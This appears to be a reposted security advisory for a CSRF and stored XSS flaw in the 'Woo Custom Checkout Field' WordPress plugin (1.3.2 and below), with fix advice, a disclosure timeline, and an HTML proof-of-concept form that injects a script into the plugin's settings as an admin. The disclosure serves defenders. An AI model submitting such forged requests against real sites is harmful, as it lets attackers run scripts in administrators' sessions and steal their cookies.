Woo Custom Checkout Field <= 1.3.2 CSRF + Stored XSS Disclosure

Datetime:2016-08-22 21:55:20         Topic: XSS Vulnerability          Share        Original >>
Here to See The Original Article!!!




Due to a lack of CSRF mitigation and entity encoding in the ccf_insert function found on line 118 of include/ccf.php and in the output generated by template/datagrid.php , it is possible to store and execute scripts in the context of an admin user.

CVSS Score


CVSS Vector


Versions Affected

1.3.2 and below


No official solution has been published by the vendor, nor have they acknowledged the issue at hand.

A simple and temporary work around for the XSS vulnerability is to wrap all data output in the template/datagrid.php file in calls to htmlentities (see http://php.net/manual/en/function.htmlentities.php for usage).

To fix the CSRF vulnerability, one will need to implement a nonce into the ccf_insert function, see https://codex.wordpress.org/WordPress_Nonces for examples of how to do this.

Proof of Concept

<form method="post" action="http://[target]/wp-admin/admin.php?page=ccf_settings_menu">  
    <input type="text" name="txt_field_name" value="field_name">
    <input type="text" name="txt_field_class" value="<script>alert(document.cookie);</script>">
    <input type="text" name="txt_field_placeholder" value="placeholder">
    <input type="text" name="txt_field_type" value="text">
    <input type="text" name="txt_field_options" value="">
    <input type="submit" name="add_field" value="Submit">

WordPress Exploit Framework Module




Disclosure Timeline

  • 2016-07-23 : Identified vulnerability, contacted vendor with POC and advice on how to resolve the issue.
  • 2016-07-25 : No response from vendor, contacting WordPress to report issue.
  • 2016-07-26 : Public disclosure


Put your ads here, just $200 per month.